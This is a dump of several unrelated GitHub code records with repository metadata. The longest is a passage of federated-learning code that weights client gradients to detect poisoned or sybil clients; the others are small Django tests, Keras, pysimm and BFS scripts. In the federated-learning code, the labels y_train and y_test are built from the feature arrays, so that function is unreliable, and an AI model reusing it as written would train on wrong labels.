log_name,grads, num_sybils=1):\n n_clients = len(grads)\n sm = smp.cosine_similarity(grads) - np.eye(n_clients)\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nCS Similarity is\\n {}\\n\".format(cs))\n # f.close()\n maxsm = np.max(sm, axis=1)\n prc = 1\n #print(\"Maxcs is \\n {}\".format(maxcs))\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nMaxcs is \\n {}\\n\".format(maxcs)) \n # f.close()\n\n # pardoning\n for i in range(n_clients):\n for j in range(n_clients):\n if i == j:\n continue\n if maxsm[i] < maxsm[j]:\n sm[i][j] = sm[i][j] * maxsm[i] / maxsm[j] * prc\n wv = 1 - (np.max(sm, axis=1))\n\n wv[wv > 1] = 1\n wv[wv < 0] = 0\n\n alpha = np.max(sm, axis=1)\n\n # Rescale so that max value is wv\n wv = wv / np.max(wv)\n wv[(wv == 1)] = .99\n\n # Logit function\n wv = (np.log(wv / (1 - wv)) + 0.5)\n wv[(np.isinf(wv) + wv > 1)] = 1\n wv[(wv < 0)] = 0\n\n # wv is the weight\n return wv,alpha\n\ndef ts_ss(v, eps=1e-15, eps2=1e-4):\n # reusable compute\n v_inner = torch.mm(v, v.t())\n vs = v.norm(dim=-1, keepdim=True)\n vs_dot = vs.mm(vs.t())\n\n # compute triangle(v)\n v_cos = v_inner / vs_dot\n v_cos = v_cos.clamp(-1. + eps2, 1. - eps2) # clamp to avoid backprop instability\n theta_ = torch.acos(v_cos) + math.radians(10)\n theta_rad = theta_ * math.pi / 180.\n tri = (vs_dot * torch.sin(theta_rad)) / 2.\n\n # compute sector(v)\n v_norm = (v ** 2).sum(-1, keepdim=True)\n euc_dist = v_norm + v_norm.t() - 2.0 * v_inner\n euc_dist = torch.sqrt(torch.abs(euc_dist) + eps) # add epsilon to avoid srt(0.)\n magnitude_diff = (vs - vs.t()).abs()\n sec = math.pi * (euc_dist + magnitude_diff) ** 2 * theta_ / 360.\n\n return tri * sec\n\n\n# Takes in grad\n# Compute similarity\n# Get weightings\ndef asf(path, attack, defense, log_name,grads, num_sybils=1):\n n_clients = len(grads)\n # 3. TS-SS Triangle Area Similarity - Sector Area Similarity\n v = torch.tensor(grads)\n # TS-SS normalized\n distance_calc = ts_ss(v).numpy()\n normalized = 2.*(distance_calc - np.min(distance_calc))/np.ptp(distance_calc)-1\n sm = normalized - np.eye(n_clients)\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nASF Similarity is\\n {}\\n\".format(sm))\n # f.close()\n prc = 0.05 \n maxsm = np.max(sm, axis=1)\n #print(\"Maxsm is\\n {}\".format(maxsm))\n #with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n # f.write(\"\\nMaxsm is\\n {}\".format(maxsm))\n # f.close()\n \n # pardoning\n for i in range(n_clients):\n for j in range(n_clients):\n if i == j:\n continue\n if maxsm[i] < maxsm[j]:\n sm[i][j] = sm[i][j] * maxsm[i] / maxsm[j] * prc\n wv = 1 - (np.max(sm, axis=1))\n\n wv[wv > 1] = 1\n wv[wv < 0] = 0\n\n alpha = np.max(sm, axis=1)\n\n # Rescale so that max value is wv\n wv = wv / np.max(wv)\n wv[(wv == 1)] = .99\n\n # Logit function\n wv = (np.log(wv / (1 - wv)) + 0.5)\n wv[(np.isinf(wv) + wv > 1)] = 1\n wv[(wv < 0)] = 0\n\n # wv is the weight\n return wv,alpha\n\n\n\ndef make_sim_timesteps(x_data, y_data, num_steps):\n X = []\n y = []\n #print(\"In Time Steps\\nAppend num_steps:{} rows\\n\".format(num_steps))\n #Time steps drops length of arr - num_steps to length of arr - so add num_steps at end to get all\n x_data_plus_steps = np.copy(x_data)\n y_data_plus_steps = np.copy(y_data)\n for x in range(num_steps):\n x_data_plus_steps = np.vstack([x_data_plus_steps, np.array(x_data[x])])\n for j in range(num_steps):\n y_data_plus_steps = np.vstack([y_data_plus_steps,np.array(y_data[j])])\n\n #print(\"\\nCheck Length of x/y_data: {}|{} vs x/y_data_plus_steps: {}|{}\\n:::: Start Loop ::::\\n\".format(x_data.shape[0],y_data.shape[0],x_data_plus_steps.shape[0],y_data_plus_steps.shape[0]))\n #print(\"x_data_plus\\n{}\".format(x_data_plus_steps))\n #print(\"y_data_plus\\n{}\".format(y_data_plus_steps))\n #use the length of original array for iterations\n for i in range(x_data.shape[0]):\n #new sliding window index\n end_ix = i + num_steps\n seq_X = x_data_plus_steps[i:end_ix]\n seq_y = y_data_plus_steps[end_ix]\n seq_y = float(seq_y)\n X.append(seq_X)\n y.append(seq_y)\n #print(\"i:{} | end_ix:{} |\\nseq_X:\\n{}|\\nseq_y:\\n{}\".format(i,end_ix,seq_X,seq_y))\n\n #print(\"Make output arrs:\\nLen of X:{}\\n\".format(len(X)))\n x_array = np.array(X)\n y_array = np.vstack([np.array(i) for i in y])\n\n print(\"Check outputs:\\nx_array shape : {}\\n{}\\n\\ny_array shape : {}\\n{}\\n\".format(x_array.shape,x_array,y_array.shape,y_array))\n return x_array, y_array\n\n\n# Takes in grad\n# Compute similarity\n# Get weightings\ndef sim(path, attack, defense, log_name,grads, num_sybils=1):\n #1. Get weighted vectors of ASF, FG, Manhattan, ED, and Logit\n #Get ASF WV\n wv_asf, alpha = asf(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n #Get FG WV\n wv_fg, alpha = foolsGold(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n #Get Manhattan WV\n wv_mn, alpha = manhattan(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n #Get ED WV\n wv_ed, alpha = ed(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n #Get Logits WV\n wv_lg = get_inv_logit(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n #Get Jacard WV\n #wv_jc, alpha = jaccard(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n #Get Norm Dist T WV\n wv_nd_T,alpha = get_norm_dist(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n #Get std T WV\n wv_std,alpha = get_std(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n\n\n #Make Train Test Data sets\n poison_timesteps = poison_config.POISON_TIMESTEPS\n if attack == 'label' or attack == 'backdoor':\n if num_sybils == 1:\n y = config.Y_25_CLIENTS_1_SYBIL\n elif num_sybils == 5:\n y = config.Y_25_CLIENTS_5_SYBIL\n else:\n y = config.Y_25_CLIENTS_10_SYBIL\n if attack == 'dba':\n if num_sybils == 1:\n y = config.Y_25_CLIENTS_4_SYBIL\n elif num_sybils == 5:\n y = config.Y_25_CLIENTS_20_SYBIL\n else:\n y = config.Y_25_CLIENTS_40_SYBIL\n \n print(\"\\ny shape {}\\n\".format(y.shape))\n print(y)\n wv_asf = np.array(wv_asf)\n print(\"\\nwv_asf shape {}\\n\".format(wv_asf.shape))\n print(wv_asf)\n wv_fg = np.array(wv_fg)\n print(\"\\nwv_fg shape {}\\n\".format(wv_fg.shape))\n print(wv_fg)\n wv_mn = np.array(wv_mn)\n print(\"\\nwv_mn shape {}\\n\".format(wv_mn.shape))\n print(wv_mn)\n wv_ed = np.array(wv_ed)\n print(\"\\nwv_ed shape {}\\n\".format(wv_ed.shape))\n print(wv_ed)\n\n ### Fix logits\n wv_lg = np.array(wv_lg)\n #print(\"\\nwv_lg shape {}\\n\".format(wv_lg.shape))\n #print(wv_lg)\n\n wv_lg = np.delete(wv_lg,0,axis=0)\n #print(\"\\nwv_lg shape {}\\n\".format(wv_lg.shape))\n #print(wv_lg)\n\n wv_lg = np.transpose(wv_lg)\n print(\"\\nwv_lg shape {}\\n\".format(wv_lg.shape))\n print(wv_lg)\n \n #wv_jc = np.array(wv_jc)\n #print(\"\\nwv_jc shape {}\\n\".format(wv_jc.shape))\n #print(wv_jc)\n wv_nd_T = np.array(wv_nd_T)\n print(\"\\nwv_nd_T shape {}\\n\".format(wv_nd_T.shape))\n print(wv_nd_T)\n wv_std = np.array(wv_std)\n print(\"\\nwv_std shape {}\\n\".format(wv_std.shape))\n print(wv_std)\n\n x = np.column_stack((wv_asf,wv_fg))\n xmn = np.column_stack((x,wv_mn))\n xed = np.column_stack((xmn,wv_ed)) \n xlg = np.column_stack((xed,wv_lg))\n #xjc = np.column_stack((xlg,wv_jc))\n xndT = np.column_stack((xlg,wv_nd_T))\n xstd = np.column_stack((xndT,wv_std))\n xy = np.column_stack((xstd,y))\n\n print(\"\\nxy shape: {}\\n{}\".format(xy.shape,xy))\n rows, cols = xy.shape\n xy = np.nan_to_num(xy, nan=np.nanmean(xy)) \n for i in range(rows):\n asf_val = xy[i][0]\n fg_val = xy[i][1]\n mn_val = xy[i][2]\n ed_val = xy[i][3]\n lg_val = xy[i][4]\n #jc_val = xy[i][5]\n ndT_val = xy[i][5]\n std_val = xy[i][6]\n y_val = xy[i][7]\n list_data = [asf_val,fg_val,mn_val,ed_val,lg_val,ndT_val,std_val,y_val]\n with open(config.PATH +'poison_training.csv' ,'a',newline='') as f_object:\n writer_object = writer(f_object)\n writer_object.writerow(list_data)\n f_object.close()\n\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_poison_model_'+ log_name,'a') as f:\n f.write(\"\\ny shape {}\\n\".format(y.shape))\n f.write(str(y))\n f.write(\"\\nwv_asf shape {}\\n\".format(wv_asf.shape))\n f.write(str(wv_asf))\n f.write(\"\\nwv_fg shape {}\\n\".format(wv_fg.shape))\n f.write(str(wv_fg))\n f.write(\"\\nwv_mn shape {}\\n\".format(wv_mn.shape))\n f.write(str(wv_mn))\n f.write(\"\\nwv_ed shape {}\\n\".format(wv_ed.shape))\n f.write(str(wv_ed))\n f.write(\"\\nwv_lg shape {}\\n\".format(wv_lg.shape))\n f.write(str(wv_lg))\n #f.write(\"\\nwv_jc shape {}\\n\".format(wv_jc.shape))\n #f.write(str(wv_jc))\n f.write(\"\\nwv_ndT shape {}\\n\".format(wv_nd_T.shape))\n f.write(str(wv_nd_T))\n f.write(\"\\nwv_std shape {}\\n\".format(wv_std.shape))\n f.write(str(wv_std))\n f.write(\"\\nxy shape: {}\\n{}\".format(xy.shape,xy))\n f.close()\n\n '''\n if attack == 'label' or attack == 'backdoor':\n if num_sybils == 1:\n train, test = train_test_split(xy, test_size = 8, train_size= 18)\n elif num_sybils == 5:\n train, test = train_test_split(xy, test_size = 10, train_size= 20)\n else:\n train, test = train_test_split(xy, test_size = 12, train_size= 23)\n if attack == 'dba':\n if num_sybils == 1:\n train, test = train_test_split(xy, test_size = 9, train_size= 20)\n elif num_sybils == 5:\n train, test = train_test_split(xy, test_size = 15, train_size= 30)\n else:\n train, test = train_test_split(xy, test_size = 20, train_size= 45)\n '''\n #print(\"train shape after tts {}\".format(train.shape))\n #print(train)\n #print(\"test shape after tts {}\".format(test.shape))\n #print(test)\n\n ##### to categorical if you want to use softmax\n #CLASSES = ['1.0', '0.0']\n # this is one hot encoding for binary classificaiton\n #y_train = np.array(keras.utils.to_categorical(y_train, len(CLASSES)))\n #y_test = np.array(keras.utils.to_categorical(y_test, len(CLASSES)))\n \n #y_train = np.asarray(y_train)\n #y_test = np.asarray(y_test)\n\n #REMOVE LABEL FROM X remove features from Y\n #TODO ##################################################################\n #######################################################################\n # do y's one time for each feature......................................((((((()))))))\n '''\n x_train = np.delete(train,poison_config.POISON_FEATURES,1)\n y_train_asf_rm = np.delete(train,0,1)\n y_train_fg_rm = np.delete(y_train_asf_rm,0,1)\n y_train_mn_rm = np.delete(y_train_fg_rm,0,1)\n y_train_ed_rm = np.delete(y_train_mn_rm,0,1)\n y_train_lg_rm = np.delete(y_train_ed_rm,0,1)\n #y_train_jc_rm = np.delete(y_train_lg_rm,0,1)\n y_train_ndT_rm = np.delete(y_train_lg_rm,0,1)\n y_train = np.delete(y_train_ndT_rm,0,1)\n x_test = np.delete(test,poison_config.POISON_FEATURES,1)\n y_test_asf_rm = np.delete(test,0,1)\n y_test_fg_rm = np.delete(y_test_asf_rm,0,1)\n y_test_mn_rm = np.delete(y_test_fg_rm,0,1)\n y_test_ed_rm = np.delete(y_test_mn_rm,0,1)\n y_test_lg_rm = np.delete(y_test_ed_rm,0,1)\n #y_test_jc_rm = np.delete(y_test_lg_rm,0,1)\n y_test_ndT_rm = np.delete(y_test_lg_rm,0,1)\n y_test = np.delete(y_test_ndT_rm,0,1)\n '''\n #print(\"x_train shape after deletes {}\".format(x_train.shape))\n #print(x_train)\n #print(\"x_test shape after deletes {}\".format(x_test.shape))\n #print(x_test)\n #print(\"y_train shape after deletes {}\".format(y_train.shape))\n #print(y_train)\n #print(\"y_test shape after deletes {}\".format(y_test.shape))\n #print(y_test)\n\n x_full = np.delete(xy,poison_config.POISON_FEATURES,1)\n y_train_asf_rm = np.delete(xy,0,1)\n y_train_fg_rm = np.delete(y_train_asf_rm,0,1)\n y_train_mn_rm = np.delete(y_train_fg_rm,0,1)\n y_train_ed_rm = np.delete(y_train_mn_rm,0,1)\n y_train_lg_rm = np.delete(y_train_ed_rm,0,1)\n #y_train_jc_rm = np.delete(y_train_lg_rm,0,1)\n y_train_ndT_rm = np.delete(y_train_lg_rm,0,1)\n labels_full = np.delete(y_train_ndT_rm,0,1)\n #y = np.transpose(y)\n # Use make timesteps for LSTM timesteps.\n #print(\"sending x_train and y_train to make times steps {}\".format(poison_timesteps))\n data,labels = make_sim_timesteps(np.array(x_full),np.array(labels_full),poison_timesteps)\n #print(\"sending x_test and y_test to make times steps {}\".format(poison_timesteps))\n #x_test, y_test = make_sim_timesteps(np.array(x_test), np.array(y_test), poison_timesteps)\n #print(\"x_train shape after time steps {}\\n\".format(x_train.shape))\n #print(x_train)\n #print(\"y_train shape after time steps {}\\n\".format(y_train.shape))\n #print(y_train)\n #print(\"x_test shape after time steps {}\\n\".format(x_test.shape))\n #print(x_test)\n #print(\"y_test shape after time steps {}\\n\".format(y_test.shape))\n #print(y_test)\n\n #Reshape for LSTM model to take as tensors\n #x_train = x_train.reshape(x_train.shape[0], poison_timesteps, config.POISON_FEATURES)\n #x_test = x_test.reshape(x_test.shape[0], poison_timesteps, config.POISON_FEATURES) \n #assert x_train.shape[0] == y_train.shape[0]\n #assert x_test.shape[0] == y_test.shape[0] \n\n xy = np.column_stack((data,labels))\n\n if attack == 'label' or attack == 'backdoor':\n if num_sybils == 1:\n train, test = train_test_split(xy, test_size = 8, train_size= 18)\n elif num_sybils == 5:\n train, test = train_test_split(xy, test_size = 10, train_size= 20)\n else:\n train, test = train_test_split(xy, test_size = 12, train_size= 23)\n if attack == 'dba':\n if num_sybils == 1:\n train, test = train_test_split(xy, test_size = 9, train_size= 20)\n elif num_sybils == 5:\n train, test = train_test_split(xy, test_size = 15, train_size= 30)\n else:\n train, test = train_test_split(xy, test_size = 20, train_size= 45)\n\n x_train = np.delete(train,poison_config.POISON_FEATURES,1)\n y_train_asf_rm = np.delete(train,0,1)\n y_train_fg_rm = np.delete(y_train_asf_rm,0,1)\n y_train_mn_rm = np.delete(y_train_fg_rm,0,1)\n y_train_ed_rm = np.delete(y_train_mn_rm,0,1)\n y_train_lg_rm = np.delete(y_train_ed_rm,0,1)\n #y_train_jc_rm = np.delete(y_train_lg_rm,0,1)\n y_train_ndT_rm = np.delete(y_train_lg_rm,0,1)\n y_train = np.delete(y_train_ndT_rm,0,1)\n x_test = np.delete(test,poison_config.POISON_FEATURES,1)\n y_test_asf_rm = np.delete(test,0,1)\n y_test_fg_rm = np.delete(y_test_asf_rm,0,1)\n y_test_mn_rm = np.delete(y_test_fg_rm,0,1)\n y_test_ed_rm = np.delete(y_test_mn_rm,0,1)\n y_test_lg_rm = np.delete(y_test_ed_rm,0,1)\n #y_test_jc_rm = np.delete(y_test_lg_rm,0,1)\n y_test_ndT_rm = np.delete(y_test_lg_rm,0,1)\n y_test = np.delete(y_test_ndT_rm,0,1)\n\n x_train = np.asarray(x_train)\n x_test = np.asarray(x_test)\n y_train = np.asarray(x_train)\n y_test = np.asarray(x_test)\n \n data = np.asarray(data)\n labels = np.asarray(labels)\n #print(\"x_train shape after reshape {}\".format(x_train.shape))\n #print(\"x_test shape after reshape {}\".format(x_test.shape))\n #x_full = np.append(x_train,x_test,axis=0)\n #y_full = np.append(y_train,y_test,axis=0)\n #print(\"full_set shape {}\".format(full_set.shape))\n # wv is the weight\n return x_train, x_test, y_train, y_test, data, labels\n\n# client_grads = Compute gradients from all the clients\ndef aggregate_gradients(path, attack, defense, log_name, client_grads, num_sybils=1):\n num_clients = len(client_grads)\n with open(path + attack +'_'+ str(num_sybils) +'_sybil_'+ defense +'_'+ log_name,'a') as f:\n f.write(\"\\naggregate_gradients Total Client Grads: {}\\n\".format(num_clients))\n f.close()\n print(\"Aggregating Gradients for Total of Clients: {}\".format(num_clients))\n \n grad_len = np.array(client_grads[0][-2].data.shape).prod()\n\n grads = np.zeros((num_clients, grad_len))\n for i in range(len(client_grads)):\n grads[i] = np.reshape(client_grads[i][-2].data, (grad_len))\n\n if defense == 'sim':\n x_train, x_test, y_train, y_test, x_full, y_full = sim(config.PATH, config.ATTACK, config.DEFENSE, config.LOG_NAME,grads, config.NUM_SYBILS)\n\n return x_train, x_test, y_train, y_test, x_full, y_full\n\ndef weight_scalling_factor(clients_trn_data, client_name):\n local_count = 1\n global_count = len(clients_trn_data)\n return local_count/global_count\n\ndef scale_model_weights(weight, scalar):\n '''function for scaling a models weights'''\n weight_final = []\n steps = len(weight)\n for i in range(steps):\n weight_final.append(scalar * weight[i])\n return weight_final\n\n\ndef sum_scaled_weights(path, attack, defense, log_name,scaled_weight_list, poison_factor,num_sybils=1): \n '''Return the sum of the listed scaled weights. The is equivalent to scaled avg of the weights'''\n #scale = poison_factor.numpy()\n #print(\"poison_factor shape {}\".format(poison_factor.shape))\n print(\"scaled_weight_list: Rows {} cols {}\".format(len(scaled_weight_list),len(scaled_weight_list[0])))\n with open(config.PATH + config.ATTACK +'_'+ str(config.NUM_SYBILS) +'_sybil_'+ config.DEFENSE +'_poison_model_'+ config.LOG_NAME,'a') as f:\n f.write(\"scaled_weight_list: Rows {} cols {}\".format(len(scaled_weight_list),len(scaled_weight_list[0])))\n f.close()\n honest_clients = []\n for c, client_grad in enumerate(scaled_weight_list):\n print(\"c is {} and poison[c] is : {}\".format(c, poison_factor[c]))\n if poison_factor[c] == 1:\n print(\"Adding node: {} value: {} to honest_clients\".format(c,poison_factor[c]))\n with open(config.PATH + config.ATTACK +'_'+ str(config.NUM_SYBILS) +'_sybil_'+ config.DEFENSE +'_poison_model_'+ config.LOG_NAME,'a') as f:\n f.write(\"Adding node: {} value: {} to honest_clients\".format(c,poison_factor[c]))\n f.close()\n honest_clients.append(client_grad)\n\n ##################################\n ##################################\n ##################################\n #### uncomment when you find a way to ensure one honest client\n print(\"After Nodes removed: Rows {} cols {}\".format(len(honest_clients),len(honest_clients[0])))\n with open(config.PATH + config.ATTACK +'_'+ str(config.NUM_SYBILS) +'_sybil_'+ config.DEFENSE +'_poison_model_'+ config.LOG_NAME,'a') as f:\n f.write(\"After Nodes removed: Rows {} cols {}\".format(len(honest_clients),len(honest_clients[0])))\n f.close()\n\n\n avg_grad = []\n # get the average grad accross all client gradients\n for grad_list_tuple in zip(*honest_clients):\n layer_mean = tf.math.reduce_sum(grad_list_tuple, axis=0)\n avg_grad.append(layer_mean)\n return avg_grad\n\ndef baseline_sum_scaled_weights_ids(path, attack, defense, log_name,scaled_weight_list,num_sybils):\n '''Return the sum of the listed scaled weights. The is equivalent to scaled avg of the weights'''\n print(\"scaled_weight_list: Rows {} cols {}\".format(len(scaled_weight_list),len(scaled_weight_list[0])))\n avg_grad = []\n # get the average grad accross all client gradients\n for grad_list_tuple in zip(*scaled_weight_list):\n #for grad_list_tuple in zip(*poison_grads):\n layer_mean = tf.math.reduce_sum(grad_list_tuple, axis=0)\n avg_grad.append(layer_mean)\n return avg_grad\n \n","repo_name":"dunhamc13/TimeSeries","sub_path":"fl_ss_utils.py","file_name":"fl_ss_utils.py","file_ext":"py","file_size_in_byte":51832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"23075782439","text":"\"\"\" This module tests the functions in validators.py in the booking app. \"\"\"\n\nimport datetime\nfrom django.test import TestCase\nfrom django.core.exceptions import ValidationError\nfrom . import validators\n\n\nclass TestValidators(TestCase):\n \"\"\"\n Contains the tests for the validators used in the BookingForm.\n Located in the booking directory in validators.py.\n \"\"\"\n def test_future_date_validates(self):\n \"\"\"\n Using the datetime libray, stores todays date in a variable.\n Then adds one day to this variable to collect tomorrows date.\n Removes one day from the today variable to collect yesterdays date.\n\n Using the 'future' variable asserts no errors are raised when\n passed to the validate_future_date method.\n\n Using the 'today' and 'yesterday' variables asserts ValidationErrors\n are raised when passed to the validate_future_date method\n \"\"\"\n today = datetime.date.today()\n future = today + datetime.timedelta(days=1)\n yesterday = today - datetime.timedelta(days=1)\n\n self.assertIsNone(validators.validate_future_date(future))\n\n with self.assertRaises(ValidationError):\n validators.validate_future_date(today)\n\n with self.assertRaises(ValidationError):\n validators.validate_future_date(yesterday)\n\n def test_guest_size_validates(self):\n \"\"\"\n Creates a list of the number of guests that pass validation.\n Iterates over this list and asserts that no errors are raised\n when passing the integer value to the validate_guest_size method.\n\n Then asserts that the integers 0 or 9 raise a validation error\n when passed to the validate_guest_size method.\n \"\"\"\n guests = [1, 2, 3, 4, 5, 6, 7, 8]\n\n for num in guests:\n self.assertIsNone(validators.validate_guest_size(num))\n\n with self.assertRaises(ValidationError):\n validators.validate_guest_size(0)\n\n with self.assertRaises(ValidationError):\n validators.validate_guest_size(9)\n","repo_name":"LewisCM14/restaurant-booking-app","sub_path":"booking/test_validators.py","file_name":"test_validators.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74271721851","text":"# Karl Paju IS22\r\nnumbrid = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\npaaris = 0\r\npaaritu = 0\r\n\r\nfor num in numbrid:\r\n if num % 2 == 0:\r\n paaris += 1\r\n else:\r\n paaritu += 1\r\n\r\nprint(\"Paaris arvud: \", paaris)\r\nprint(\"Paaritu arvud: \", paaritu)\r\n","repo_name":"KarinEegreid/T-leht","sub_path":"Paaris_Paaritu.py","file_name":"Paaris_Paaritu.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2885874333","text":"from keras import applications\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dropout, Flatten, Dense\n\ndef models_factory(model_type, image_size):\n\n if model_type == \"vgg16\":\n base_model = applications.VGG16(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n elif model_type == \"vgg19\":\n base_model = applications.VGG19(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n elif model_type == \"resnet50\":\n base_model = applications.ResNet50(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n elif model_type == \"inceptionv3\":\n base_model = applications.InceptionV3(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n elif model_type == \"xception\":\n base_model = applications.Xception(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n elif model_type == \"mobilenet\":\n base_model = applications.MobileNet(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n elif model_type == \"inceptionresnetv2\":\n base_model = applications.InceptionResNetV2(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n elif model_type == \"nasnet\":\n base_model = applications.nasnet.NASNetLarge(weights = 'imagenet', include_top = False, input_shape = (image_size[0], image_size[1], 3))\n\n for layer in base_model.layers:\n layer.trainable = False\n \n top_model = Sequential()\n top_model.add(Flatten(input_shape=base_model.output_shape[1:]))\n top_model.add(Dense(1024, kernel_initializer = 'glorot_uniform', activation='relu'))\n top_model.add(Dense(1024, kernel_initializer = 'glorot_uniform', activation='relu'))\n top_model.add(Dense(1, activation = 'sigmoid'))\n model = Model(input = base_model.input, output = top_model(base_model.output))\n\n return model, base_model","repo_name":"samsachdeva183/image_classification","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3014351550","text":"# write a function that takes a filename and returns the number of lines the\n# file consists. It should return zero if the file not exists.\n\ndef file_reader(file):\n\ttry:\n\t\twith open(file) as f:\n\t\t\treturn len(f.readlines())\n\texcept FileNotFoundError:\n\t\treturn 0\n\nprint(file_reader(\"open.txt\"))","repo_name":"greenfox-velox/szepnapot","sub_path":"week-05/3-exceptions/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40205933715","text":"from pysimm import system, lmps\nfrom pysimm.apps.random_walk import random_walk\n\n\ndef monomer(ff, is_capped=False):\n try:\n s = system.read_pubchem_smiles('CC(C)C(=O)OC')\n except:\n import os\n s = system.read_mol(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, 'topologies', 'CC(C)C(=O)OC.mol'))\n \n s.apply_forcefield(ff)\n \n c3 = s.particles[3]\n c4 = s.particles[4]\n\n if not is_capped:\n for b in c3.bonds:\n if b.a.elem == 'H' or b.b.elem == 'H':\n pb = b.a if b.b is c3 else b.b\n s.particles.remove(pb.tag, update=False)\n break\n\n for b in c4.bonds:\n if b.a.elem == 'H' or b.b.elem == 'H':\n pb = b.a if b.b is c4 else b.b\n s.particles.remove(pb.tag, update=False)\n break\n s.remove_spare_bonding()\n\n s.set_box(padding=10)\n \n c3.linker = 'head'\n c4.linker = 'tail'\n \n lmps.quick_min(s, min_style='fire')\n s.add_particle_bonding()\n \n return s\n\n\ndef polymer_chain(length, ff):\n return random_walk(monomer(ff), length, forcefield=ff)","repo_name":"polysimtools/pysimm","sub_path":"pysimm/models/monomers/ff_typers/pmma.py","file_name":"pmma.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"78"} +{"seq_id":"29440795752","text":"from collections import deque\r\n\r\nT = int(input())\r\nresult = []\r\nfor _ in range(T):\r\n M, N, K = map(int, input().split(\" \"))\r\n dx = [-1, 0, 1, 0]\r\n dy = [0, -1, 0, 1]\r\n temp = [[0]*M for _ in range(N)]\r\n visited = [[0]*M for _ in range(N)]\r\n for i in range(K):\r\n x, y = map(int, input().split(\" \"))\r\n temp[y][x] = 1\r\n \r\n s = 0\r\n for yy in range(N):\r\n for xx in range(M):\r\n if temp[yy][xx] == 1 and not visited[yy][xx] == 1:\r\n visited[yy][xx] = 1\r\n q = deque()\r\n q.append((xx, yy))\r\n while q:\r\n x, y = q.popleft()\r\n for i in range(4):\r\n nx = x + dx[i]\r\n ny = y + dy[i]\r\n if 0 <= nx < M and 0 <= ny < N and temp[ny][nx] and not visited[ny][nx]:\r\n q.append((nx, ny))\r\n visited[ny][nx] = 1\r\n s += 1\r\n result.append(s)\r\n \r\nfor i in range(len(result)):\r\n print(result[i])","repo_name":"JoonHyug/BaekJoon","sub_path":"백준/Silver/1012. 유기농 배추/유기농 배추.py","file_name":"유기농 배추.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17305495662","text":"# -*- coding: utf-8 -*-\r\n## @file main.py\r\n# @brief honeypot checker code source\r\n\r\n\r\nfrom tabulate import tabulate\r\n\r\nmain_thing = \"...data.items\"\r\nbuy_fee = \"5%\"\r\nsell_fee = \"7%\"\r\nlock_balance = \"lock_balance\"\r\nscore = \"90\"\r\nowner_balance =\"1ETH\"\r\ntop10_bauer = \"top_10_buyer\"\r\ntop10_seller = \"top10_seller\"\r\ncount_less_05 = \"count_less_05\"\r\ntotal_count = \"len(data)\"\r\nlinks_count = \"links_count\"\r\n\r\n\r\ndef draw_table(data):\r\n\r\n data_list = []\r\n\r\n for i in data:\r\n data_list.append([\r\n i[\"Name\"], i[\"Liquidity\"], i[\"Total/Less\"], i[\"Social\"],\r\n i[\"Honeypot\"], i[\"TSflag\"], i[\"TSsellable\"], i[\"Buy fee\"], i[\"Sell fee\"],\r\n i[\"Risk Level\"], i[\"Score\"], i[\"CreatedAt\"], i[\"Address\"], i[\"TSLink\"],\r\n ])\r\n\r\n columns = [\r\n \"Name\", \"Liquidity\", \"Total/Less\", \"Social\", \"Honeypot\", \"TSflag\", \"TSsellable\", \"Buy fee\",\r\n \"Sell fee\", \"Risk Level\", \"Score\", \"CreatedAt\", \"Address\", \"TSLink\"\r\n ]\r\n\r\n print(tabulate(data_list, headers=columns, showindex=\"always\"))\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n draw_table({})\r\n\r\n\r\n","repo_name":"mikhailk921/crypto_search_engine","sub_path":"src/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3551665470","text":"import numpy as np\n\n\ndef 